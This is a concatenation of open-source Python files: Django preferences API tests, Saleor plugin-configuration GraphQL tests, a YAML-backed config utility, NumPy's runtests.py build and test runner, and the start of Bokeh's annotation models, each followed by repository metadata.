'api:global-detail',
kwargs={'pk': pref.preference.identifier()})
self.client.login(username='admin', password="test")
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
payload = json.loads(response.content.decode('utf-8'))
self.assertEqual(pref.preference.identifier(), payload['identifier'])
self.assertEqual(pref.value, payload['value'])
def test_can_update_preference(self):
manager = registry.manager()
pref = manager.get_db_pref(section='user', name='max_users')
url = reverse(
'api:global-detail',
kwargs={'pk': pref.preference.identifier()})
self.client.login(username='admin', password="test")
response = self.client.patch(
url, json.dumps({'value': 16}), content_type='application/json')
self.assertEqual(response.status_code, 200)
pref = manager.get_db_pref(section='user', name='max_users')
self.assertEqual(pref.value, 16)
def test_can_update_decimal_preference(self):
manager = registry.manager()
pref = manager.get_db_pref(section='type', name='cost')
url = reverse(
'api:global-detail',
kwargs={'pk': pref.preference.identifier()})
self.client.login(username='admin', password="test")
response = self.client.patch(
url, json.dumps({'value': '111.11'}), content_type='application/json')
self.assertEqual(response.status_code, 200)
pref = manager.get_db_pref(section='type', name='cost')
self.assertEqual(pref.value, Decimal('111.11'))
def test_can_update_multiple_preferences(self):
manager = registry.manager()
pref = manager.get_db_pref(section='user', name='max_users')
url = reverse('api:global-bulk')
self.client.login(username='admin', password="test")
payload = {
'user__max_users': 16,
'user__registration_allowed': True,
}
response = self.client.post(
url, json.dumps(payload), content_type='application/json')
self.assertEqual(response.status_code, 200)
pref1 = manager.get_db_pref(section='user', name='max_users')
pref2 = manager.get_db_pref(
section='user', name='registration_allowed')
self.assertEqual(pref1.value, 16)
self.assertEqual(pref2.value, True)
def test_update_preference_returns_validation_error(self):
manager = registry.manager()
pref = manager.get_db_pref(section='user', name='max_users')
url = reverse(
'api:global-detail',
kwargs={'pk': pref.preference.identifier()})
self.client.login(username='admin', password="test")
response = self.client.patch(
url, json.dumps({'value': 1001}), content_type='application/json')
self.assertEqual(response.status_code, 400)
payload = json.loads(response.content.decode('utf-8'))
self.assertEqual(payload['value'], ['Wrong value!'])
def test_update_multiple_preferences_with_validation_errors_rollback(self):
manager = registry.manager()
pref = manager.get_db_pref(section='user', name='max_users')
url = reverse('api:global-bulk')
self.client.login(username='admin', password="test")
payload = {
'user__max_users': 1001,
'user__registration_allowed': True,
}
response = self.client.post(
url, json.dumps(payload), content_type='application/json')
self.assertEqual(response.status_code, 400)
errors = json.loads(response.content.decode('utf-8'))
self.assertEqual(
errors[pref.preference.identifier()]['value'], ['Wrong value!'])
pref1 = manager.get_db_pref(section='user', name='max_users')
pref2 = manager.get_db_pref(
section='user', name='registration_allowed')
self.assertEqual(pref1.value, pref1.preference.default)
self.assertEqual(pref2.value, pref2.preference.default)
|
haroon-sheikh/django-dynamic-preferences
|
tests/test_rest_framework.py
|
Python
|
bsd-3-clause
| 9,073
|
import graphene
import pytest
from saleor.extensions import ConfigurationTypeField
from saleor.extensions.manager import get_extensions_manager
from saleor.extensions.models import PluginConfiguration
from tests.api.utils import get_graphql_content
from tests.extensions.sample_plugins import PluginSample
from tests.extensions.utils import get_config_value
@pytest.fixture
def staff_api_client_can_manage_plugins(staff_api_client, permission_manage_plugins):
staff_api_client.user.user_permissions.add(permission_manage_plugins)
return staff_api_client
PLUGINS_QUERY = """
{
plugins(first:1){
edges{
node{
name
description
active
id
configuration{
name
type
value
helpText
label
}
}
}
}
}
"""
def test_query_plugin_configurations(staff_api_client_can_manage_plugins, settings):
# Enable test plugin
settings.PLUGINS = ["tests.api.test_extensions.PluginSample"]
response = staff_api_client_can_manage_plugins.post_graphql(PLUGINS_QUERY)
content = get_graphql_content(response)
plugins = content["data"]["plugins"]["edges"]
assert len(plugins) == 1
plugin = plugins[0]["node"]
plugin_configuration = PluginConfiguration.objects.get()
    configuration_structure = PluginSample.CONFIG_STRUCTURE
assert plugin["name"] == plugin_configuration.name
assert plugin["active"] == plugin_configuration.active
assert plugin["description"] == plugin_configuration.description
for index, configuration_item in enumerate(plugin["configuration"]):
assert (
configuration_item["name"]
== plugin_configuration.configuration[index]["name"]
)
if (
            configuration_structure[configuration_item["name"]]["type"]
== ConfigurationTypeField.STRING
):
assert (
configuration_item["value"]
== plugin_configuration.configuration[index]["value"]
)
elif configuration_item["value"] is None:
assert not plugin_configuration.configuration[index]["value"]
else:
assert (
configuration_item["value"]
== str(plugin_configuration.configuration[index]["value"]).lower()
)
@pytest.mark.parametrize(
"password, expected_password, api_key, expected_api_key",
[
(None, None, None, None),
("ABCDEFGHIJ", "", "123456789", "6789"),
("", None, "", None),
(None, None, "1234", "4"),
],
)
def test_query_plugins_hides_secret_fields(
password,
expected_password,
api_key,
expected_api_key,
staff_api_client,
permission_manage_plugins,
settings,
):
settings.PLUGINS = ["tests.api.test_extensions.PluginSample"]
manager = get_extensions_manager()
plugin_configuration = manager.get_plugin_configuration(PluginSample.PLUGIN_NAME)
for conf_field in plugin_configuration.configuration:
if conf_field["name"] == "Password":
conf_field["value"] = password
if conf_field["name"] == "API private key":
conf_field["value"] = api_key
plugin_configuration.save()
staff_api_client.user.user_permissions.add(permission_manage_plugins)
response = staff_api_client.post_graphql(PLUGINS_QUERY)
content = get_graphql_content(response)
plugins = content["data"]["plugins"]["edges"]
assert len(plugins) == 1
plugin = plugins[0]["node"]
for conf_field in plugin["configuration"]:
if conf_field["name"] == "Password":
assert conf_field["value"] == expected_password
if conf_field["name"] == "API private key":
assert conf_field["value"] == expected_api_key
PLUGIN_QUERY = """
query plugin($id: ID!){
plugin(id:$id){
name
description
active
configuration{
name
value
type
helpText
label
}
}
}
"""
@pytest.mark.parametrize(
"password, expected_password, api_key, expected_api_key",
[
(None, None, None, None),
("ABCDEFGHIJ", "", "123456789", "6789"),
("", None, "", None),
(None, None, "1234", "4"),
],
)
def test_query_plugin_hides_secret_fields(
password,
expected_password,
api_key,
expected_api_key,
staff_api_client,
permission_manage_plugins,
settings,
):
settings.PLUGINS = ["tests.api.test_extensions.PluginSample"]
manager = get_extensions_manager()
plugin_configuration = manager.get_plugin_configuration(PluginSample.PLUGIN_NAME)
for conf_field in plugin_configuration.configuration:
if conf_field["name"] == "Password":
conf_field["value"] = password
if conf_field["name"] == "API private key":
conf_field["value"] = api_key
plugin_configuration.save()
configuration_id = graphene.Node.to_global_id("Plugin", plugin_configuration.pk)
variables = {"id": configuration_id}
staff_api_client.user.user_permissions.add(permission_manage_plugins)
response = staff_api_client.post_graphql(PLUGIN_QUERY, variables)
content = get_graphql_content(response)
plugin = content["data"]["plugin"]
for conf_field in plugin["configuration"]:
if conf_field["name"] == "Password":
assert conf_field["value"] == expected_password
if conf_field["name"] == "API private key":
assert conf_field["value"] == expected_api_key
def test_query_plugin_configuration(
staff_api_client, permission_manage_plugins, settings
):
settings.PLUGINS = ["tests.api.test_extensions.PluginSample"]
manager = get_extensions_manager()
plugin_configuration = manager.get_plugin_configuration("PluginSample")
configuration_id = graphene.Node.to_global_id("Plugin", plugin_configuration.pk)
variables = {"id": configuration_id}
staff_api_client.user.user_permissions.add(permission_manage_plugins)
response = staff_api_client.post_graphql(PLUGIN_QUERY, variables)
content = get_graphql_content(response)
plugin = content["data"]["plugin"]
assert plugin["name"] == plugin_configuration.name
assert plugin["active"] == plugin_configuration.active
assert plugin["description"] == plugin_configuration.description
configuration_item = plugin["configuration"][0]
assert configuration_item["name"] == plugin_configuration.configuration[0]["name"]
assert configuration_item["value"] == plugin_configuration.configuration[0]["value"]
PLUGIN_UPDATE_MUTATION = """
mutation pluginUpdate(
$id: ID!, $active: Boolean, $configuration: [ConfigurationItemInput]){
pluginUpdate(
id:$id,
input:{active: $active, configuration: $configuration}
){
plugin{
name
active
configuration{
name
value
type
helpText
label
}
}
errors{
field
message
}
}
}
"""
@pytest.mark.parametrize(
"active, updated_configuration_item",
[
(True, {"name": "Username", "value": "user"}),
(False, {"name": "Username", "value": "admin@example.com"}),
],
)
def test_plugin_configuration_update(
staff_api_client_can_manage_plugins, settings, active, updated_configuration_item
):
settings.PLUGINS = ["tests.extensions.sample_plugins.PluginSample"]
manager = get_extensions_manager()
plugin = manager.get_plugin_configuration(plugin_name="PluginSample")
old_configuration = plugin.configuration
plugin_id = graphene.Node.to_global_id("Plugin", plugin.pk)
variables = {
"id": plugin_id,
"active": active,
"configuration": [updated_configuration_item],
}
response = staff_api_client_can_manage_plugins.post_graphql(
PLUGIN_UPDATE_MUTATION, variables
)
get_graphql_content(response)
plugin = PluginConfiguration.objects.get(name="PluginSample")
assert plugin.active == active
first_configuration_item = plugin.configuration[0]
assert first_configuration_item["name"] == updated_configuration_item["name"]
assert first_configuration_item["value"] == updated_configuration_item["value"]
assert set(first_configuration_item.keys()) == {"name", "value"}
second_configuration_item = plugin.configuration[1]
assert second_configuration_item["name"] == old_configuration[1]["name"]
assert second_configuration_item["value"] == old_configuration[1]["value"]
assert set(second_configuration_item.keys()) == {"name", "value"}
def test_plugin_update_saves_boolean_as_boolean(
staff_api_client_can_manage_plugins, settings
):
settings.PLUGINS = ["tests.extensions.sample_plugins.PluginSample"]
manager = get_extensions_manager()
plugin = manager.get_plugin_configuration(plugin_name="PluginSample")
use_sandbox = get_config_value("Use sandbox", plugin.configuration)
plugin_id = graphene.Node.to_global_id("Plugin", plugin.pk)
variables = {
"id": plugin_id,
"active": plugin.active,
"configuration": [{"name": "Use sandbox", "value": True}],
}
response = staff_api_client_can_manage_plugins.post_graphql(
PLUGIN_UPDATE_MUTATION, variables
)
content = get_graphql_content(response)
assert len(content["data"]["pluginUpdate"]["errors"]) == 0
plugin.refresh_from_db()
use_sandbox_new_value = get_config_value("Use sandbox", plugin.configuration)
assert type(use_sandbox) == type(use_sandbox_new_value)
@pytest.mark.parametrize(
"plugin_filter, count",
[
({"search": "PluginSample"}, 1),
({"search": "description"}, 2),
({"active": True}, 2),
({"search": "Plugin"}, 2),
({"active": "False", "search": "Plugin"}, 1),
],
)
def test_plugins_query_with_filter(
plugin_filter, count, staff_api_client_can_manage_plugins, settings
):
settings.PLUGINS = [
"tests.extensions.sample_plugins.PluginSample",
"tests.extensions.sample_plugins.PluginInactive",
"tests.extensions.sample_plugins.ActivePlugin",
]
query = """
query ($filter: PluginFilterInput) {
plugins(first: 5, filter:$filter) {
totalCount
edges {
node {
id
}
}
}
}
"""
variables = {"filter": plugin_filter}
response = staff_api_client_can_manage_plugins.post_graphql(query, variables)
content = get_graphql_content(response)
assert content["data"]["plugins"]["totalCount"] == count
QUERY_PLUGIN_WITH_SORT = """
query ($sort_by: PluginSortingInput!) {
plugins(first:5, sortBy: $sort_by) {
edges{
node{
name
}
}
}
}
"""
@pytest.mark.parametrize(
"plugin_sort, result_order",
[
(
{"field": "NAME", "direction": "ASC"},
["Active", "PluginInactive", "PluginSample"],
),
(
{"field": "NAME", "direction": "DESC"},
["PluginSample", "PluginInactive", "Active"],
),
(
{"field": "IS_ACTIVE", "direction": "ASC"},
["PluginInactive", "Active", "PluginSample"],
),
(
{"field": "IS_ACTIVE", "direction": "DESC"},
["Active", "PluginSample", "PluginInactive"],
),
],
)
def test_query_plugins_with_sort(
plugin_sort, result_order, staff_api_client_can_manage_plugins, settings
):
settings.PLUGINS = [
"tests.extensions.sample_plugins.PluginSample",
"tests.extensions.sample_plugins.PluginInactive",
"tests.extensions.sample_plugins.ActivePlugin",
]
variables = {"sort_by": plugin_sort}
response = staff_api_client_can_manage_plugins.post_graphql(
QUERY_PLUGIN_WITH_SORT, variables
)
content = get_graphql_content(response)
plugins = content["data"]["plugins"]["edges"]
for order, plugin_name in enumerate(result_order):
assert plugins[order]["node"]["name"] == plugin_name
|
maferelo/saleor
|
tests/api/test_extensions.py
|
Python
|
bsd-3-clause
| 12,488
|
"""Tools for easy persistance of configuration and user preferences for tools.
Configurations are split into sections and keys; sections are conceptually for
each tool (or other grouping of settings), and keys are for individual settings
within that tool/section. In the current implementation, individual sections
are saved within YAML files as a mapping.
Basic usage::
# Creating the config object; give it a unique name. Slashes will be
# used directly to specify sub-directories.
config = metatools.config.Config('your_company/' + __name__)
# Use a value within the config; treat it like a dict.
dialog = setup_gui(width=config.get('width', 800))
# Save the values later.
config['width'] = dialog.width()
config.save() # Only if there were changes to the values.
Quick use::
width = metatools.config.get('your_company/' + __name__, 'width')
metatools.config.set('your_company/' + __name__, 'width', width)
"""
import os
import yaml
class Config(dict):
"""Mapping which persists to disk via YAML serialization.
Use like a dictionary.
"""
def __init__(self, name):
self.name = name
if os.path.isabs(name):
self.path = name
else:
self.path = os.path.expanduser('~/.%s.yml' % name)
self.revert()
def revert(self):
"""Revert to saved state."""
if not os.path.exists(self.path):
self.clear()
else:
saved = yaml.load(open(self.path).read())
self.clear()
self.update(saved)
self.dirty = False
def save(self, force=False):
"""Persist the current contents.
:param bool force: Always write, even if there were no changes.
"""
if not force and not self.dirty:
return
if self:
encoded = yaml.dump(dict(self),
indent=4,
default_flow_style=False,
)
directory = os.path.dirname(self.path)
if not os.path.exists(directory):
os.makedirs(directory)
with open(self.path, 'wb') as fh:
fh.write(encoded)
elif os.path.exists(self.path):
os.unlink(self.path)
def delete(self):
"""Clear and delete; same as clear() and save()."""
self.clear()
if os.path.exists(self.path):
os.unlink(self.path)
def __setitem__(self, key, value):
super(Config, self).__setitem__(key, value)
self.dirty = True
def update(self, *args, **kwargs):
super(Config, self).update(*args, **kwargs)
self.dirty = True
def __delitem__(self, key):
super(Config, self).__delitem__(key)
self.dirty = True
def __enter__(self):
return self
def __exit__(self, type_, value, tb):
if not type_:
self.save()
def get(section, name, *args):
config = Config(section)
try:
return config[name]
except KeyError:
if args:
return args[0]
else:
raise
def set(section, name, value):
config = Config(section)
config[name] = value
config.save()
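# --- Editor's illustrative sketch (not part of the original module). ---
# Config also works as a context manager (see __enter__/__exit__ above):
# changes made inside the block are persisted automatically on a clean
# exit. The temp-file location is an assumption for the demo; any absolute
# path bypasses the ~/.<name>.yml convention.
def _demo_context_manager():
    import tempfile
    path = os.path.join(tempfile.mkdtemp(), 'demo.yml')
    with Config(path) as config:
        config['width'] = 800
    assert Config(path)['width'] == 800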
def main():
import ast
from optparse import OptionParser
optparser = OptionParser('%prog [options] section name [value]')
opts, args = optparser.parse_args()
# Basic get.
if len(args) == 2:
print get(*args)
# Basic set.
elif len(args) == 3:
section, name, raw_value = args
try:
value = ast.literal_eval(raw_value)
except SyntaxError:
value = raw_value
set(section, name, value)
else:
optparser.print_usage()
exit(1)
if __name__ == '__main__':
main()
|
mikeboers/metatools
|
metatools/config.py
|
Python
|
bsd-3-clause
| 3,791
|
#!/usr/bin/env python
"""
runtests.py [OPTIONS] [-- ARGS]
Run tests, building the project first.
Examples::
$ python runtests.py
$ python runtests.py -s {SAMPLE_SUBMODULE}
$ python runtests.py -t {SAMPLE_TEST}
$ python runtests.py --ipython
$ python runtests.py --python somescript.py
$ python runtests.py --bench
$ python runtests.py --durations 20
Run a debugger:
$ gdb --args python runtests.py [...other args...]
Generate C code coverage listing under build/lcov/:
(requires http://ltp.sourceforge.net/coverage/lcov.php)
$ python runtests.py --gcov [...other args...]
$ python runtests.py --lcov-html
"""
from __future__ import division, print_function
#
# This is a generic test runner script for projects using NumPy's test
# framework. Change the following values to adapt to your project:
#
PROJECT_MODULE = "numpy"
PROJECT_ROOT_FILES = ['numpy', 'LICENSE.txt', 'setup.py']
SAMPLE_TEST = "numpy/linalg/tests/test_linalg.py::test_byteorder_check"
SAMPLE_SUBMODULE = "linalg"
EXTRA_PATH = ['/usr/lib/ccache', '/usr/lib/f90cache',
'/usr/local/lib/ccache', '/usr/local/lib/f90cache']
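# --- Editor's illustrative sketch (not part of the original script). ---
# How the constants above might look when this runner is adapted for a
# hypothetical project named "mypkg"; every value here is an assumption,
# kept commented out so nothing is redefined.
# PROJECT_MODULE = "mypkg"
# PROJECT_ROOT_FILES = ['mypkg', 'LICENSE.txt', 'setup.py']
# SAMPLE_TEST = "mypkg/tests/test_core.py::test_basic"
# SAMPLE_SUBMODULE = "core"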
# ---------------------------------------------------------------------
if __doc__ is None:
__doc__ = "Run without -OO if you want usage info"
else:
__doc__ = __doc__.format(**globals())
import sys
import os
# In case we are run from the source directory, we don't want to import the
# project from there:
sys.path.pop(0)
import shutil
import subprocess
import time
from argparse import ArgumentParser, REMAINDER
ROOT_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__)))
def main(argv):
parser = ArgumentParser(usage=__doc__.lstrip())
parser.add_argument("--verbose", "-v", action="count", default=1,
help="more verbosity")
parser.add_argument("--debug-configure", action="store_true",
help=("add -v to build_src to show compiler "
"configuration output while creating "
"_numpyconfig.h and config.h"))
parser.add_argument("--no-build", "-n", action="store_true", default=False,
help="do not build the project (use system installed version)")
parser.add_argument("--build-only", "-b", action="store_true", default=False,
help="just build, do not run any tests")
parser.add_argument("--doctests", action="store_true", default=False,
help="Run doctests in module")
parser.add_argument("--refguide-check", action="store_true", default=False,
help="Run refguide (doctest) check (do not run regular tests.)")
parser.add_argument("--coverage", action="store_true", default=False,
help=("report coverage of project code. HTML output goes "
"under build/coverage"))
parser.add_argument("--durations", action="store", default=-1, type=int,
help=("Time N slowest tests, time all if 0, time none if < 0"))
parser.add_argument("--gcov", action="store_true", default=False,
help=("enable C code coverage via gcov (requires GCC). "
"gcov output goes to build/**/*.gc*"))
parser.add_argument("--lcov-html", action="store_true", default=False,
help=("produce HTML for C code coverage information "
"from a previous run with --gcov. "
"HTML output goes to build/lcov/"))
parser.add_argument("--mode", "-m", default="fast",
help="'fast', 'full', or something that could be "
"passed to nosetests -A [default: fast]")
parser.add_argument("--submodule", "-s", default=None,
help="Submodule whose tests to run (cluster, constants, ...)")
parser.add_argument("--pythonpath", "-p", default=None,
help="Paths to prepend to PYTHONPATH")
parser.add_argument("--tests", "-t", action='append',
help="Specify tests to run")
parser.add_argument("--python", action="store_true",
help="Start a Python shell with PYTHONPATH set")
parser.add_argument("--ipython", "-i", action="store_true",
help="Start IPython shell with PYTHONPATH set")
parser.add_argument("--shell", action="store_true",
help="Start Unix shell with PYTHONPATH set")
parser.add_argument("--debug", "-g", action="store_true",
help="Debug build")
parser.add_argument("--parallel", "-j", type=int, default=0,
help="Number of parallel jobs during build")
parser.add_argument("--warn-error", action="store_true",
help="Set -Werror to convert all compiler warnings to errors")
parser.add_argument("--show-build-log", action="store_true",
help="Show build output rather than using a log file")
parser.add_argument("--bench", action="store_true",
help="Run benchmark suite instead of test suite")
parser.add_argument("--bench-compare", action="store", metavar="COMMIT",
help=("Compare benchmark results of current HEAD to "
"BEFORE. Use an additional "
"--bench-compare=COMMIT to override HEAD with "
"COMMIT. Note that you need to commit your "
"changes first!"))
parser.add_argument("args", metavar="ARGS", default=[], nargs=REMAINDER,
help="Arguments to pass to Nose, Python or shell")
args = parser.parse_args(argv)
if args.durations < 0:
args.durations = -1
if args.bench_compare:
args.bench = True
args.no_build = True # ASV does the building
if args.lcov_html:
# generate C code coverage output
lcov_generate()
sys.exit(0)
if args.pythonpath:
for p in reversed(args.pythonpath.split(os.pathsep)):
sys.path.insert(0, p)
if args.gcov:
gcov_reset_counters()
if args.debug and args.bench:
print("*** Benchmarks should not be run against debug "
"version; remove -g flag ***")
if not args.no_build:
# we need the noarch path in case the package is pure python.
site_dir, site_dir_noarch = build_project(args)
sys.path.insert(0, site_dir)
sys.path.insert(0, site_dir_noarch)
os.environ['PYTHONPATH'] = site_dir + os.pathsep + site_dir_noarch
else:
_temp = __import__(PROJECT_MODULE)
site_dir = os.path.sep.join(_temp.__file__.split(os.path.sep)[:-2])
extra_argv = args.args[:]
if extra_argv and extra_argv[0] == '--':
extra_argv = extra_argv[1:]
if args.python:
# Debugging issues with warnings is much easier if you can see them
print("Enabling display of all warnings")
import warnings
import types
warnings.filterwarnings("always")
if extra_argv:
# Don't use subprocess, since we don't want to include the
# current path in PYTHONPATH.
sys.argv = extra_argv
with open(extra_argv[0], 'r') as f:
script = f.read()
sys.modules['__main__'] = types.ModuleType('__main__')
ns = dict(__name__='__main__',
__file__=extra_argv[0])
exec_(script, ns)
sys.exit(0)
else:
import code
code.interact()
sys.exit(0)
if args.ipython:
# Debugging issues with warnings is much easier if you can see them
print("Enabling display of all warnings and pre-importing numpy as np")
import warnings; warnings.filterwarnings("always")
import IPython
import numpy as np
IPython.embed(user_ns={"np": np})
sys.exit(0)
if args.shell:
shell = os.environ.get('SHELL', 'cmd' if os.name == 'nt' else 'sh')
print("Spawning a shell ({})...".format(shell))
subprocess.call([shell] + extra_argv)
sys.exit(0)
if args.coverage:
dst_dir = os.path.join(ROOT_DIR, 'build', 'coverage')
fn = os.path.join(dst_dir, 'coverage_html.js')
if os.path.isdir(dst_dir) and os.path.isfile(fn):
shutil.rmtree(dst_dir)
extra_argv += ['--cov-report=html:' + dst_dir]
if args.refguide_check:
cmd = [os.path.join(ROOT_DIR, 'tools', 'refguide_check.py'),
'--doctests']
if args.submodule:
cmd += [args.submodule]
os.execv(sys.executable, [sys.executable] + cmd)
sys.exit(0)
if args.bench:
# Run ASV
items = extra_argv
if args.tests:
items += args.tests
if args.submodule:
items += [args.submodule]
bench_args = []
for a in items:
bench_args.extend(['--bench', a])
if not args.bench_compare:
cmd = ['asv', 'run', '-n', '-e', '--python=same'] + bench_args
ret = subprocess.call(cmd, cwd=os.path.join(ROOT_DIR, 'benchmarks'))
sys.exit(ret)
else:
commits = [x.strip() for x in args.bench_compare.split(',')]
if len(commits) == 1:
commit_a = commits[0]
commit_b = 'HEAD'
elif len(commits) == 2:
commit_a, commit_b = commits
else:
p.error("Too many commits to compare benchmarks for")
# Check for uncommitted files
if commit_b == 'HEAD':
r1 = subprocess.call(['git', 'diff-index', '--quiet',
'--cached', 'HEAD'])
r2 = subprocess.call(['git', 'diff-files', '--quiet'])
if r1 != 0 or r2 != 0:
print("*"*80)
print("WARNING: you have uncommitted changes --- "
"these will NOT be benchmarked!")
print("*"*80)
# Fix commit ids (HEAD is local to current repo)
out = subprocess.check_output(['git', 'rev-parse', commit_b])
commit_b = out.strip().decode('ascii')
out = subprocess.check_output(['git', 'rev-parse', commit_a])
commit_a = out.strip().decode('ascii')
cmd = ['asv', 'continuous', '-e', '-f', '1.05',
commit_a, commit_b] + bench_args
ret = subprocess.call(cmd, cwd=os.path.join(ROOT_DIR, 'benchmarks'))
sys.exit(ret)
if args.build_only:
sys.exit(0)
else:
__import__(PROJECT_MODULE)
test = sys.modules[PROJECT_MODULE].test
if args.submodule:
tests = [PROJECT_MODULE + "." + args.submodule]
elif args.tests:
tests = args.tests
else:
tests = None
# Run the tests under build/test
if not args.no_build:
test_dir = site_dir
else:
test_dir = os.path.join(ROOT_DIR, 'build', 'test')
if not os.path.isdir(test_dir):
os.makedirs(test_dir)
shutil.copyfile(os.path.join(ROOT_DIR, '.coveragerc'),
os.path.join(test_dir, '.coveragerc'))
cwd = os.getcwd()
try:
os.chdir(test_dir)
result = test(args.mode,
verbose=args.verbose,
extra_argv=extra_argv,
doctests=args.doctests,
coverage=args.coverage,
durations=args.durations,
tests=tests)
finally:
os.chdir(cwd)
if isinstance(result, bool):
sys.exit(0 if result else 1)
elif result.wasSuccessful():
sys.exit(0)
else:
sys.exit(1)
def build_project(args):
"""
Build a dev version of the project.
Returns
-------
site_dir
        site-packages directory where it was installed
    site_dir_noarch
        noarch site-packages directory (for the pure-Python parts)
    """
import distutils.sysconfig
root_ok = [os.path.exists(os.path.join(ROOT_DIR, fn))
for fn in PROJECT_ROOT_FILES]
if not all(root_ok):
print("To build the project, run runtests.py in "
"git checkout or unpacked source")
sys.exit(1)
dst_dir = os.path.join(ROOT_DIR, 'build', 'testenv')
env = dict(os.environ)
cmd = [sys.executable, 'setup.py']
# Always use ccache, if installed
env['PATH'] = os.pathsep.join(EXTRA_PATH + env.get('PATH', '').split(os.pathsep))
cvars = distutils.sysconfig.get_config_vars()
compiler = env.get('CC') or cvars.get('CC', '')
if 'gcc' in compiler:
# Check that this isn't clang masquerading as gcc.
if sys.platform != 'darwin' or 'gnu-gcc' in compiler:
# add flags used as werrors
warnings_as_errors = ' '.join([
# from tools/travis-test.sh
'-Werror=vla',
'-Werror=nonnull',
'-Werror=pointer-arith',
'-Wlogical-op',
# from sysconfig
'-Werror=unused-function',
])
env['CFLAGS'] = warnings_as_errors + ' ' + env.get('CFLAGS', '')
if args.debug or args.gcov:
# assume everyone uses gcc/gfortran
env['OPT'] = '-O0 -ggdb'
env['FOPT'] = '-O0 -ggdb'
    if args.gcov:
env['CC'] = cvars['CC'] + ' --coverage'
env['CXX'] = cvars['CXX'] + ' --coverage'
env['F77'] = 'gfortran --coverage '
env['F90'] = 'gfortran --coverage '
env['LDSHARED'] = cvars['LDSHARED'] + ' --coverage'
env['LDFLAGS'] = " ".join(cvars['LDSHARED'].split()[1:]) + ' --coverage'
cmd += ["build"]
if args.parallel > 1:
cmd += ["-j", str(args.parallel)]
if args.debug_configure:
cmd += ["build_src", "--verbose"]
if args.warn_error:
cmd += ["--warn-error"]
# Install; avoid producing eggs so numpy can be imported from dst_dir.
cmd += ['install', '--prefix=' + dst_dir,
'--single-version-externally-managed',
            '--record=' + os.path.join(dst_dir, 'tmp_install_log.txt')]
from distutils.sysconfig import get_python_lib
site_dir = get_python_lib(prefix=dst_dir, plat_specific=True)
site_dir_noarch = get_python_lib(prefix=dst_dir, plat_specific=False)
    # easy_install refuses to install to a path that Python cannot see by
    # default and that isn't on the PYTHONPATH. Plus, it has to exist.
if not os.path.exists(site_dir):
os.makedirs(site_dir)
if not os.path.exists(site_dir_noarch):
os.makedirs(site_dir_noarch)
env['PYTHONPATH'] = site_dir + ':' + site_dir_noarch
log_filename = os.path.join(ROOT_DIR, 'build.log')
if args.show_build_log:
ret = subprocess.call(cmd, env=env, cwd=ROOT_DIR)
else:
print("Building, see build.log...")
with open(log_filename, 'w') as log:
p = subprocess.Popen(cmd, env=env, stdout=log, stderr=log,
cwd=ROOT_DIR)
try:
# Wait for it to finish, and print something to indicate the
# process is alive, but only if the log file has grown (to
                # allow continuous integration environments to kill a hanging
# process accurately if it produces no output)
last_blip = time.time()
last_log_size = os.stat(log_filename).st_size
while p.poll() is None:
time.sleep(0.5)
if time.time() - last_blip > 60:
log_size = os.stat(log_filename).st_size
if log_size > last_log_size:
print(" ... build in progress")
last_blip = time.time()
last_log_size = log_size
ret = p.wait()
except:
p.kill()
p.wait()
raise
if ret == 0:
print("Build OK")
else:
if not args.show_build_log:
with open(log_filename, 'r') as f:
print(f.read())
print("Build failed!")
sys.exit(1)
return site_dir, site_dir_noarch
#
# GCOV support
#
def gcov_reset_counters():
print("Removing previous GCOV .gcda files...")
build_dir = os.path.join(ROOT_DIR, 'build')
for dirpath, dirnames, filenames in os.walk(build_dir):
for fn in filenames:
if fn.endswith('.gcda') or fn.endswith('.da'):
pth = os.path.join(dirpath, fn)
os.unlink(pth)
#
# LCOV support
#
LCOV_OUTPUT_FILE = os.path.join(ROOT_DIR, 'build', 'lcov.out')
LCOV_HTML_DIR = os.path.join(ROOT_DIR, 'build', 'lcov')
def lcov_generate():
try: os.unlink(LCOV_OUTPUT_FILE)
except OSError: pass
try: shutil.rmtree(LCOV_HTML_DIR)
except OSError: pass
print("Capturing lcov info...")
subprocess.call(['lcov', '-q', '-c',
'-d', os.path.join(ROOT_DIR, 'build'),
'-b', ROOT_DIR,
'--output-file', LCOV_OUTPUT_FILE])
print("Generating lcov HTML output...")
ret = subprocess.call(['genhtml', '-q', LCOV_OUTPUT_FILE,
'--output-directory', LCOV_HTML_DIR,
'--legend', '--highlight'])
if ret != 0:
print("genhtml failed!")
else:
print("HTML output generated under build/lcov/")
#
# Python 3 support
#
if sys.version_info[0] >= 3:
import builtins
exec_ = getattr(builtins, "exec")
else:
def exec_(code, globs=None, locs=None):
"""Execute code in a namespace."""
if globs is None:
frame = sys._getframe(1)
globs = frame.f_globals
if locs is None:
locs = frame.f_locals
del frame
elif locs is None:
locs = globs
exec("""exec code in globs, locs""")
if __name__ == "__main__":
main(argv=sys.argv[1:])
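# Illustrative invocations (a sketch; the flag spellings assume the argument
# parser defined earlier in this script wires them up as shown):
#
#     $ python runtests.py                  # build, then run the full suite
#     $ python runtests.py -s core          # test a single submodule
#     $ python runtests.py --ipython        # warnings on, np pre-imported
#     $ python runtests.py --bench bench_core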
| MSeifert04/numpy | runtests.py | Python | bsd-3-clause | 18,292 |
''' Renderers for various kinds of annotations that can be added to
Bokeh plots
'''
from __future__ import absolute_import
from six import string_types
from ..core.enums import (AngleUnits, Dimension, FontStyle, LegendClickPolicy, LegendLocation,
Orientation, RenderMode, SpatialUnits, TextAlign)
from ..core.has_props import abstract
from ..core.properties import (Angle, AngleSpec, Auto, Bool, ColorSpec, Datetime, Dict, DistanceSpec, Either,
Enum, Float, FontSizeSpec, Include, Instance, Int, List, NumberSpec, Override,
Seq, String, StringSpec, Tuple, value)
from ..core.property_mixins import FillProps, LineProps, TextProps
from ..core.validation import error
from ..core.validation.errors import BAD_COLUMN_NAME, NON_MATCHING_DATA_SOURCES_ON_LEGEND_ITEM_RENDERERS
from ..model import Model
from ..util.serialization import convert_datetime_type
from .formatters import BasicTickFormatter, TickFormatter
from .mappers import ContinuousColorMapper
from .renderers import GlyphRenderer, Renderer
from .sources import ColumnDataSource, DataSource
from .tickers import BasicTicker, Ticker
@abstract
class Annotation(Renderer):
''' Base class for all annotation models.
'''
plot = Instance(".models.plots.Plot", help="""
The plot to which this annotation is attached.
""")
level = Override(default="annotation")
@abstract
class TextAnnotation(Annotation):
''' Base class for text annotation models such as labels and titles.
'''
class LegendItem(Model):
    ''' A single entry in a legend, pairing a label with the glyph
    renderers it represents.
    '''
def __init__(self, *args, **kwargs):
super(LegendItem, self).__init__(*args, **kwargs)
if isinstance(self.label, string_types):
# Allow convenience of setting label as a string
self.label = value(self.label)
label = StringSpec(default=None, help="""
